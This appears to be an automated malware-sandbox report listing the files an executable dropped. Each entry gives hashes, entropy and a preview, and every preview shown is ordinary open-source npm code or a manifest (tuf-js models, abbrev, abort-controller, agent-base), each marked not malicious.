              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.Signature = void 0;./**. * A container class containing information about a signature.. *. * Contains a signature and the keyid uniquely identifying the key used. * to generate the signature.. *. * Provide a `fromJSON` method to create a Signature from a JSON object.. */.class Signature {. constructor(options) {. const { keyID, sig } = options;. this.keyID = keyID;. this.sig = sig;. }. toJSON() {. return {. keyid: this.keyID,. sig: this.sig,. };. }. static fromJSON(data) {. const { keyid, sig } = data;. if (typeof keyid !== 'string') {. throw new TypeError('keyid must be a string');. }. if (typeof sig !== 'string') {. throw new TypeError('sig must be a string');. }. return new Signature({. keyID: keyid,. sig: sig,. });. }.}.exports.Signa
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2395
              Entropy (8bit):4.627195369271138
              Encrypted:false
              SSDEEP:
              MD5:5DC8A841E010ADA545458444915DF1C8
              SHA1:FF739DB4A1A416725B24D7B91CC345B43D8D63F0
              SHA-256:A5748407DC6AD2D8B455E945B0C950520AAF6B9F532817EA133477A0C3AF5AED
              SHA-512:711F072DEDA938F3000AB63ED130DA7BA934D5BA866BE713EE9051B740C321666FCE0B6B4015C942952A1968A3DB4AC3AA186D135EBE8C4E1B748FBF00480C1D
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.Snapshot = void 0;.const util_1 = __importDefault(require("util"));.const base_1 = require("./base");.const file_1 = require("./file");.const utils_1 = require("./utils");./**. * A container for the signed part of snapshot metadata.. *. * Snapshot contains information about all target Metadata files.. * A top-level role that specifies the latest versions of all targets metadata files,. * and hence the latest versions of all targets (including any dependencies between them) on the repository.. */.class Snapshot extends base_1.Signed {. constructor(opts) {. super(opts);. this.type = base_1.MetadataKind.Snapshot;. this.meta = opts.meta || { 'targets.json': new file_1.MetaFile({ version: 1 }) };. }. equals(other) {. if (!(other insta
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3060
              Entropy (8bit):4.5627572853761595
              Encrypted:false
              SSDEEP:
              MD5:AEC18AD2ABA7033430CDCE876B13D384
              SHA1:752B95F6A2B3A8AE31FEB2640BF4BC691C0D0480
              SHA-256:D7ABA469FACE9BC1E055D73E76AC45117EF62B863C0D84EBC6EB5B4645E19ADF
              SHA-512:B1BC08CF3BDD1CADC3206443934EA728471F81B8598B3A4689C02F45C860C485575F61944E095E39A8B5043DEBC5E777E8D5B522265C3CA7A6433DB487C8252B
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.Targets = void 0;.const util_1 = __importDefault(require("util"));.const base_1 = require("./base");.const delegations_1 = require("./delegations");.const file_1 = require("./file");.const utils_1 = require("./utils");.// Container for the signed part of targets metadata..//.// Targets contains verifying information about target files and also delegates.// responsible to other Targets roles..class Targets extends base_1.Signed {. constructor(options) {. super(options);. this.type = base_1.MetadataKind.Targets;. this.targets = options.targets || {};. this.delegations = options.delegations;. }. addTarget(target) {. this.targets[target.path] = target;. }. equals(other) {. if (!(other instanceof Targets)) {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2003
              Entropy (8bit):4.593631557653508
              Encrypted:false
              SSDEEP:
              MD5:EDC25CAE00CD7BD2300ED9F83CC046BC
              SHA1:2D5596C6638E35BE629824DF5D4C7EDD21F32A7D
              SHA-256:9BFE638CD3C9273F13D8073344C22957E6ED58813101F08A3C156AFA557A68FD
              SHA-512:33F4C07FBDAAC73F72EDB7A8FC1252A9C16A638F8DA3030C9FE2CCB94BF9C6954CB9DAFD9AA277920EA203F6C08F9279F1644E4E85FEFCE4E782EB2B1F4E5D83
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.Timestamp = void 0;.const base_1 = require("./base");.const file_1 = require("./file");.const utils_1 = require("./utils");./**. * A container for the signed part of timestamp metadata.. *. * A top-level that specifies the latest version of the snapshot role metadata file,. * and hence the latest versions of all metadata and targets on the repository.. */.class Timestamp extends base_1.Signed {. constructor(options) {. super(options);. this.type = base_1.MetadataKind.Timestamp;. this.snapshotMeta = options.snapshotMeta || new file_1.MetaFile({ version: 1 });. }. equals(other) {. if (!(other instanceof Timestamp)) {. return false;. }. return super.equals(other) && this.snapshotMeta.equals(other.snapshotMeta);. }. toJSON() {. return {. _type: this.type,. spec_version: this.specVersion,. version: th
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1273
              Entropy (8bit):4.81353817923388
              Encrypted:false
              SSDEEP:
              MD5:D28D31807B67CDF271FAD1FD8F9A32BA
              SHA1:422BA9965C3F7EC10477343EFDDFCE94748BB586
              SHA-256:5ACABBFD5B0A89DC97E82F40ECF58393DE02DD91999F830FC4A672783575E1EF
              SHA-512:979E25D8F3C3F7A2577257FDDCC5E91E4A74523AA649E7469DC40FF8F57DE0B4F14D060CE1B203AE1DF969A40B5C537D1214F85F14F3BFBAC77883C928438230
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.isObjectRecord = exports.isStringRecord = exports.isObjectArray = exports.isStringArray = exports.isObject = exports.isDefined = void 0;.function isDefined(val) {. return val !== undefined;.}.exports.isDefined = isDefined;.function isObject(value) {. return typeof value === 'object' && value !== null;.}.exports.isObject = isObject;.function isStringArray(value) {. return Array.isArray(value) && value.every((v) => typeof v === 'string');.}.exports.isStringArray = isStringArray;.function isObjectArray(value) {. return Array.isArray(value) && value.every(isObject);.}.exports.isObjectArray = isObjectArray;.function isStringRecord(value) {. return (typeof value === 'object' &&. value !== null &&. Object.keys(value).every((k) => typeof k === 'string') &&. Object.values(value).every((v) => typeof v === 'string'));.}.exports.isStringRecord = isStringRecord;.function isObject
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1247
              Entropy (8bit):4.953203862114678
              Encrypted:false
              SSDEEP:
              MD5:1C1C0454F502483F75C0AAD202E1135A
              SHA1:B5AC5DD6859FF99F9F0500B86D08E90E673C661B
              SHA-256:1E07953532F3914F5638E2AE937D0A27F8AB07BE85A8CEB00E42365308FFD2AA
              SHA-512:198631860BFAF287C86DB537A79F815A3A7B031E76A8DAD3A6A6769EAED2565332AC4BA5520769653955B9CE09A54A0DEBFFBC734824D9EE002F1F962BF03B52
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4895
              Entropy (8bit):4.939142069656853
              Encrypted:false
              SSDEEP:
              MD5:C6E3054D23C68DD5CCD5AC0CB3AF15C9
              SHA1:161F59CAA83031BB3449A00BAE43D8B2AD453EDB
              SHA-256:1272B8CCFD7717638DF7598F49B0EDDB85A69C1ED9DA4EDAEDE7FA48C1BA2E5F
              SHA-512:6F487D35F4EFCA741A76DCA5F2C24B78507C68A961C27FAB6718A4FACCF40FEC9C7195E13046807A60907DD7D677E7EF433EE6935D10C53BAC4827DA71A87381
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.getPublicKey = void 0;.const crypto_1 = __importDefault(require("crypto"));.const error_1 = require("../error");.const oid_1 = require("./oid");.const ASN1_TAG_SEQUENCE = 0x30;.const ANS1_TAG_BIT_STRING = 0x03;.const NULL_BYTE = 0x00;.const OID_EDDSA = '1.3.101.112';.const OID_EC_PUBLIC_KEY = '1.2.840.10045.2.1';.const OID_EC_CURVE_P256V1 = '1.2.840.10045.3.1.7';.const PEM_HEADER = '-----BEGIN PUBLIC KEY-----';.function getPublicKey(keyInfo) {. switch (keyInfo.keyType) {. case 'rsa':. return getRSAPublicKey(keyInfo);. case 'ed25519':. return getED25519PublicKey(keyInfo);. case 'ecdsa':. case 'ecdsa-sha2-nistp256':. case 'ecdsa-sha2-nistp384':. return getECDCSAPublicKey(keyInfo);. default:.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):891
              Entropy (8bit):4.935949389834133
              Encrypted:false
              SSDEEP:
              MD5:8DEA5E4A2E2CDD069CCBF83979AF6645
              SHA1:06F39AB81F5620E73E8206E63CD5C9892B006672
              SHA-256:35F43BC5E4C82ECD1EB3C82B88040BF53D5B183CB23B1C3C15C2A22D288BE0D3
              SHA-512:EAF61AFD8E9992AA92B27452E91EC7235395F55227A472CAFCAF62AB08C0E7ECC33D319C8BEAF8DCC1175117D3F72B88CEAA1D71F9AFF8D14375A8DD4F96361E
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.encodeOIDString = void 0;.const ANS1_TAG_OID = 0x06;.function encodeOIDString(oid) {. const parts = oid.split('.');. // The first two subidentifiers are encoded into the first byte. const first = parseInt(parts[0], 10) * 40 + parseInt(parts[1], 10);. const rest = [];. parts.slice(2).forEach((part) => {. const bytes = encodeVariableLengthInteger(parseInt(part, 10));. rest.push(...bytes);. });. const der = Buffer.from([first, ...rest]);. return Buffer.from([ANS1_TAG_OID, der.length, ...der]);.}.exports.encodeOIDString = encodeOIDString;.function encodeVariableLengthInteger(value) {. const bytes = [];. let mask = 0x00;. while (value > 0) {. bytes.unshift((value & 0x7f) | mask);. value >>= 7;. mask = 0x80;. }. return bytes;.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):667
              Entropy (8bit):4.988312352102012
              Encrypted:false
              SSDEEP:
              MD5:EA81700D8B68B2CF8C0F8AC8FA8DA36B
              SHA1:22AE58ED2D761AC2CAA3EE88BCD9E22FDB9F0994
              SHA-256:21D223EED0EBB5A993E9B8099C651D5915AEA666744D95C4E62AFB76674D6B6F
              SHA-512:1800F7C56BBBB0EC0F18E697B1ABC630F0FD3CCC7EC50177D4507361516D5ED41E963838C2528FACDC5992863358E84D176B63B18E2091DD63305E7D681B1BED
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.verifySignature = void 0;.const canonical_json_1 = require("@tufjs/canonical-json");.const crypto_1 = __importDefault(require("crypto"));.const verifySignature = (metaDataSignedData, key, signature) => {. const canonicalData = Buffer.from((0, canonical_json_1.canoniuserze)(metaDataSignedData));. return crypto_1.default.verify(undefined, canonicalData, key, Buffer.from(signature, 'hex'));.};.exports.verifySignature = verifySignature;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):845
              Entropy (8bit):4.76926675982339
              Encrypted:false
              SSDEEP:
              MD5:34FD80E249BD653888BAFAD91BFD91C5
              SHA1:467782D138D3800C409AB9AEC3141EF1096EE34B
              SHA-256:1F2D82CC239EBD15F53B68004F1CE44B9700E7EE13BFDA9592B93AA40B94E960
              SHA-512:C4CF406D0A2A2E5909AA3CD4529E4B3158B09E2B4F2AFEB9DEBC0DC30A7FEF72B5F2F429D52776BFA67B5B104AF8D27740AE78E9B9648DF733FA1F6982B988A8
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "@tufjs/models",. "version": "2.0.0",. "description": "TUF metadata models",. "main": "dist/index.js",. "types": "dist/index.d.ts",. "files": [. "dist". ],. "scripts": {. "build": "tsc --build",. "clean": "rm -rf dist && rm tsconfig.tsbuildinfo",. "test": "jest". },. "repository": {. "type": "git",. "url": "git+https://github.com/theupdateframework/tuf-js.git". },. "keywords": [. "tuf",. "security",. "update". ],. "author": "bdehamer@github.com",. "license": "MIT",. "bugs": {. "url": "https://github.com/theupdateframework/tuf-js/issues". },. "homepage": "https://github.com/theupdateframework/tuf-js/tree/main/packages/models#readme",. "dependencies": {. "@tufjs/canonical-json": "2.0.0",. "minimatch": "^9.0.3". },. "engines": {. "node": "^16.14.0 || >=18.0.0". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1315
              Entropy (8bit):4.515485676359698
              Encrypted:false
              SSDEEP:
              MD5:B800B6A498C1E01A7FE2C56C3E7912F0
              SHA1:B5DDC60DBF8B384013D5D8A8BA88531024082D44
              SHA-256:618FCFED067D950270FC3502FF521AA0A64CADAAE8D6CB52620A7CA7E97CE5B2
              SHA-512:852D58206E9585B6DD886ABE747ECF1ECB1A80FD4A1D0080F865C2B6820319199A8D8DB3D0D35D09CED7A7D3D0DCDB7CA039F299FD3CFC4AA890C76D178A37F9
              Malicious:false
              Reputation:unknown
              Preview:module.exports = abbrev..function abbrev (...args) {. let list = args.length === 1 || Array.isArray(args[0]) ? args[0] : args.. for (let i = 0, l = list.length; i < l; i++) {. list[i] = typeof list[i] === 'string' ? list[i] : String(list[i]). }.. // sort them lexicographically, so that they're next to their nearest kin. list = list.sort(lexSort).. // walk through each, seeing how much it has in common with the next and previous. const abbrevs = {}. let prev = ''. for (let ii = 0, ll = list.length; ii < ll; ii++) {. const current = list[ii]. const next = list[ii + 1] || ''. let nextMatches = true. let prevMatches = true. if (current === next) {. continue. }. let j = 0. const cl = current.length. for (; j < cl; j++) {. const curChar = current.charAt(j). nextMatches = nextMatches && curChar === next.charAt(j). prevMatches = prevMatches && curChar === prev.charAt(j). if (!nextMatches && !prevMatches) {. j++. brea
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1002
              Entropy (8bit):4.716674623713182
              Encrypted:false
              SSDEEP:
              MD5:2D79DC5B19EF786D493E807DF4FB6202
              SHA1:EE7AB1F15FC572D936E078118B6D6537F3DBEFA5
              SHA-256:FF1C1D5E1A458941FCCC312D2F7072F79DCCFA072989E493048AB18EDFC2E753
              SHA-512:D0D220F94967334AEC385AC7C2F43DB6599417C95662E997809C08DA3A7E3BAFBD47B5964949444F6CD622E031511D1A23F62E84B93D3B966B35A5B38C51D4F3
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "abbrev",. "version": "2.0.0",. "description": "Like ruby's abbrev module, but in js",. "author": "GitHub Inc.",. "main": "lib/index.js",. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "snap": "tap",. "posttest": "npm run lint". },. "repository": {. "type": "git",. "url": "https://github.com/npm/abbrev-js.git". },. "license": "ISC",. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.8.0",. "tap": "^16.3.0". },. "tap": {. "nyc-arg": [. "--exclude",. "tap-snapshots/**". ]. },. "files": [. "bin/",. "lib/". ],. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "templateOSS": {. "//@npmcli/template-oss": "This file is partially managed by @npmcli/template-oss. Edits may be overwritten.",. "version": "4.8.0". }.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1071
              Entropy (8bit):5.097193989495715
              Encrypted:false
              SSDEEP:
              MD5:86A65C5C19C672EE4CD52492495F1D16
              SHA1:BF0549E84B42EE6C467E1F70CB5E075DC6ECD3C7
              SHA-256:DBBF03317F0101FED5643CD87CA80FB769E358FA4F428445BF2315DEEB23A154
              SHA-512:0D192F6825F622917DF84C6B8A5B077EFFF31CC21842A6EE33639CB19E6FF84C49F256B84FD266178E0408578ACC361CD286638AED306B1D05BCEF2EA390529F
              Malicious:false
              Reputation:unknown
              Preview:MIT License..Copyright (c) 2017 Toru Nagashima..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONN
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):394
              Entropy (8bit):4.682041926641303
              Encrypted:false
              SSDEEP:
              MD5:63095B6A227A277ADDB4FAD2AB2D703C
              SHA1:D477B29E60F3C357487AF38B3FBA6DBD157EEB87
              SHA-256:F0AF5E244E61BC520C46BA9FE30ACA43A7EDFF1362BE274B2D44785359B4F629
              SHA-512:6D3703F843171F8AC805A7D309006B70AE919930E0D9ED8ECDFE4E4EAD65934D9B70895A2EF5295E87B1BF11AD2931F3F7CFA3BCE82453DFFE37AF8DE1DE3BBC
              Malicious:false
              Reputation:unknown
              Preview:/*globals self, window */."use strict"../*eslint-disable @mysticatea/prettier */.const { AbortController, AbortSignal } =. typeof self !== "undefined" ? self :. typeof window !== "undefined" ? window :. /* otherwise */ undefined./*eslint-enable @mysticatea/prettier */..module.exports = AbortController.module.exports.AbortSignal = AbortSignal.module.exports.default = AbortController.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):337
              Entropy (8bit):4.62693015612039
              Encrypted:false
              SSDEEP:
              MD5:1567D1E32EFC20A4482B256AC30163F1
              SHA1:25DF62866BB00A53FA2334E6D3F8A99D298B1459
              SHA-256:329F011E53C3016B4DA836C4F5E4D9E58FAC4B79A2AEC8CBD86FE5A75B177709
              SHA-512:463A2B5EA00E0738AA15E0590438790E081C81A70428A212183254BB723E62772CB148A4DFB71E6C0019A571C3B5089A96F01C7B15C628BA91CFEABD96712D1D
              Malicious:false
              Reputation:unknown
              Preview:/*globals self, window */../*eslint-disable @mysticatea/prettier */.const { AbortController, AbortSignal } =. typeof self !== "undefined" ? self :. typeof window !== "undefined" ? window :. /* otherwise */ undefined./*eslint-enable @mysticatea/prettier */..export default AbortController.export { AbortController, AbortSignal }.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):3610
              Entropy (8bit):4.818207110233995
              Encrypted:false
              SSDEEP:
              MD5:CC7068930C09996C9D34D8546863DCAE
              SHA1:4B19CAEA692199AA3CAB8599FE8180322222695C
              SHA-256:6B0B8D42CCFC69741B3F11B8268F094CE2A456715A5C8D2042CA5B2A033EA842
              SHA-512:F953E89A758488A99AA5B635CE299E0F6D77CFCD35BF398019553292C26D7792084194C933802BD8720F7242BD5A4DE23D89EED2301AA797032E51702E00E008
              Malicious:false
              Reputation:unknown
              Preview:/**. * @author Toru Nagashima <https://github.com/mysticatea>. * See LICENSE file in root directory for full license.. */.'use strict';..Object.defineProperty(exports, '__esModule', { value: true });..var eventTargetShim = require('event-target-shim');../**. * The signal class.. * @see https://dom.spec.whatwg.org/#abortsignal. */.class AbortSignal extends eventTargetShim.EventTarget {. /**. * AbortSignal cannot be constructed directly.. */. constructor() {. super();. throw new TypeError("AbortSignal cannot be constructed directly");. }. /**. * Returns `true` if this `AbortSignal`'s `AbortController` has signaled to abort, and `false` otherwise.. */. get aborted() {. const aborted = abortedFlags.get(this);. if (typeof aborted !== "boolean") {. throw new TypeError(`Expected 'this' to be an 'AbortSignal' object, but got ${this === null ? "null" : typeof this}`);. }. return aborted;. }.}.eventTargetShim.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):3311
              Entropy (8bit):4.78223854488904
              Encrypted:false
              SSDEEP:
              MD5:F748C95F6B70C3F67A78897226AB7962
              SHA1:E428E08860824F90719E2C5637518FCCBE07EF7E
              SHA-256:4BA744FBA41125A08484B2E628146A68DBB5C98AEEFDE1D1A98E64981058EB4A
              SHA-512:24F09486AC1399C8A4B93D9F5A65827112BCEF435DAC83B808BA2F31C329537ED18BF53EFDC489124B589B7DC08C6AF983BDC7C4456E6F615224AA9D7C6EBB50
              Malicious:false
              Reputation:unknown
              Preview:/**. * @author Toru Nagashima <https://github.com/mysticatea>. * See LICENSE file in root directory for full license.. */.import { EventTarget, defineEventAttribute } from 'event-target-shim';../**. * The signal class.. * @see https://dom.spec.whatwg.org/#abortsignal. */.class AbortSignal extends EventTarget {. /**. * AbortSignal cannot be constructed directly.. */. constructor() {. super();. throw new TypeError("AbortSignal cannot be constructed directly");. }. /**. * Returns `true` if this `AbortSignal`'s `AbortController` has signaled to abort, and `false` otherwise.. */. get aborted() {. const aborted = abortedFlags.get(this);. if (typeof aborted !== "boolean") {. throw new TypeError(`Expected 'this' to be an 'AbortSignal' object, but got ${this === null ? "null" : typeof this}`);. }. return aborted;. }.}.defineEventAttribute(AbortSignal.prototype, "abort");./**. * Create an AbortSignal object..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (9098)
              Category:dropped
              Size (bytes):9266
              Entropy (8bit):5.171046931802623
              Encrypted:false
              SSDEEP:
              MD5:B68868E438F74EEA9025B46CB729DF85
              SHA1:3998957D8729183D728B167DF8EBFC7D78568EDF
              SHA-256:0E7718A4266EA9F6C8270DC00086FD9F2C6D9D06FF57279E4890D9B02F896220
              SHA-512:D50032B8C460E28D2DFAF27234AD8FA0223ECA0EAA2FCF70457877911E311EABA5D65A8BE95F8E6C69B657D3976245516026C69FA165B472271906EAEA3253BA
              Malicious:false
              Reputation:unknown
              Preview:/**. * @author Toru Nagashima <https://github.com/mysticatea>. * See LICENSE file in root directory for full license.. */(function(a,b){"object"==typeof exports&&"undefined"!=typeof module?b(exports):"function"==typeof define&&define.amd?define(["exports"],b):(a=a||self,b(a.AbortControllerShim={}))})(this,function(a){'use strict';function b(a){return b="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(a){return typeof a}:function(a){return a&&"function"==typeof Symbol&&a.constructor===Symbol&&a!==Symbol.prototype?"symbol":typeof a},b(a)}function c(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")}function d(a,b){for(var c,d=0;d<b.length;d++)c=b[d],c.enumerable=c.enumerable||!1,c.configurable=!0,"value"in c&&(c.writable=!0),Object.defineProperty(a,c.key,c)}function e(a,b,c){return b&&d(a.prototype,b),c&&d(a,c),a}function f(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function");a
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2915
              Entropy (8bit):4.7862464946548515
              Encrypted:false
              SSDEEP:
              MD5:15BCEE0787C160D6F5462D57E0A6FA88
              SHA1:1919F0E7E241C60FFF52BDD87DF08CEEE790BA05
              SHA-256:3D64DCDCF9D0A1D045EB6BCAA5013D486F15527A3668E64B1155839A797DA164
              SHA-512:94163274394788266E20949EC7D8236F044A5F09DF9BDA103A4E080205FF2CFD22EF62E27BAF8B838611F9225F1D2B9422B11758C6B933A5EF989EC3D2694D71
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "abort-controller",. "version": "3.0.0",. "description": "An implementation of WHATWG AbortController interface.",. "main": "dist/abort-controller",. "files": [. "dist",. "polyfill.*",. "browser.*". ],. "engines": {. "node": ">=6.5". },. "dependencies": {. "event-target-shim": "^5.0.0". },. "browser": "./browser.js",. "devDependencies": {. "@babel/core": "^7.2.2",. "@babel/plugin-transform-modules-commonjs": "^7.2.0",. "@babel/preset-env": "^7.3.0",. "@babel/register": "^7.0.0",. "@mysticatea/eslint-plugin": "^8.0.1",. "@mysticatea/spy": "^0.1.2",. "@types/mocha": "^5.2.5",. "@types/node": "^10.12.18",. "assert": "^1.4.1",. "codecov": "^3.1.0",. "dts-bundle-generator": "^2.0.0",. "eslint": "^5.12.1",. "karma": "^3.1.4",. "karma-chrome-launcher": "^2.2.0",. "karma-coverage": "^1.1.2",. "karma-firefox-launcher": "^1.1.0",. "karma-growl-reporter": "^1.0.0",. "karma-ie-launcher": "^1.0.0",. "karm
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):558
              Entropy (8bit):4.636746116315276
              Encrypted:false
              SSDEEP:
              MD5:CAC4443470B5F1C08043AF35FDC4C85E
              SHA1:57215C1E3C08FAF71451BA83989539CC8611F35D
              SHA-256:84855B3FBB1A0F4EAC737B57B3E2836C0D6F433856F4577AB85DBA0635EF8EAC
              SHA-512:2C426053BA8CEF456EDAB118C10AE8206393E4C6FA86D51C835DD6B7E50FCCB74846BABB0DBE5C0C7B1F172D5DAFB910A0FB7C64F0A2012E0A4712247A962C89
              Malicious:false
              Reputation:unknown
              Preview:/*globals require, self, window */."use strict"..const ac = require("./dist/abort-controller")../*eslint-disable @mysticatea/prettier */.const g =. typeof self !== "undefined" ? self :. typeof window !== "undefined" ? window :. typeof global !== "undefined" ? global :. /* otherwise */ undefined./*eslint-enable @mysticatea/prettier */..if (g) {. if (typeof g.AbortController === "undefined") {. g.AbortController = ac.AbortController. }. if (typeof g.AbortSignal === "undefined") {. g.AbortSignal = ac.AbortSignal. }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):535
              Entropy (8bit):4.608894293913949
              Encrypted:false
              SSDEEP:
              MD5:7EFC5856563ADC1287E74CE08116FAFA
              SHA1:3B664874A9CAC197E3E021BDC2C6C13195700D0E
              SHA-256:EF4E46CA5FAEF86548F1744819F5ADF461ED1F977C90DE587068E7F87F720EF6
              SHA-512:7E10571DA236BD5864A56EFBA542632D083533244BE4248ECF7D8F92B1C82D78BB88EA77E526348074EBB0A2F9DB20990FEA2CACDFA87E386C123D61C093F8B6
              Malicious:false
              Reputation:unknown
              Preview:/*globals self, window */.import * as ac from "./dist/abort-controller"../*eslint-disable @mysticatea/prettier */.const g =. typeof self !== "undefined" ? self :. typeof window !== "undefined" ? window :. typeof global !== "undefined" ? global :. /* otherwise */ undefined./*eslint-enable @mysticatea/prettier */..if (g) {. if (typeof g.AbortController === "undefined") {. g.AbortController = ac.AbortController. }. if (typeof g.AbortSignal === "undefined") {. g.AbortSignal = ac.AbortSignal. }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):7910
              Entropy (8bit):4.154426796421885
              Encrypted:false
              SSDEEP:
              MD5:1BFCC9C7404ABB4832EF4B8929B707A1
              SHA1:EB7241164E557B1A9C3C5636C60E3956B3ABA50F
              SHA-256:13B6D658B492796461358E19FE1DE30665AB2EFB04C726B82530352CD364D4AC
              SHA-512:08E5F8E2AC8D5CF661692F6DF646509141196B01187A8FA18477A9130423DA5CDCD6DF81C699E4B792E0C91CAB6F6251825DC9BBE63101F62A1CA0D1C63BF2D2
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.const events_1 = require("events");.const debug_1 = __importDefault(require("debug"));.const promisify_1 = __importDefault(require("./promisify"));.const debug = debug_1.default('agent-base');.function isAgent(v) {. return Boolean(v) && typeof v.addRequest === 'function';.}.function isSecureEndpoint() {. const { stack } = new Error();. if (typeof stack !== 'string'). return false;. return stack.split('\n').some(l => l.indexOf('(https.js:') !== -1 || l.indexOf('node:https:') !== -1);.}.function createAgent(callback, opts) {. return new createAgent.Agent(callback, opts);.}.(function (createAgent) {. /**. * Base `http.Agent` implementation.. * No pooling/keep-alive is implemented by default.. *. * @param {Function} callback. * @api public. */. class Agent extends events_1.EventEmitter {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):495
              Entropy (8bit):4.03285543235199
              Encrypted:false
              SSDEEP:
              MD5:06AA69AF533ABC385CF197F475BE91C6
              SHA1:2930048E0FE75B88D2AF102698D87D386CA13D33
              SHA-256:7DB1E28AC19B38BE8CF3EDECAC66C7084BB00B65F6755A83309BCF10564B5771
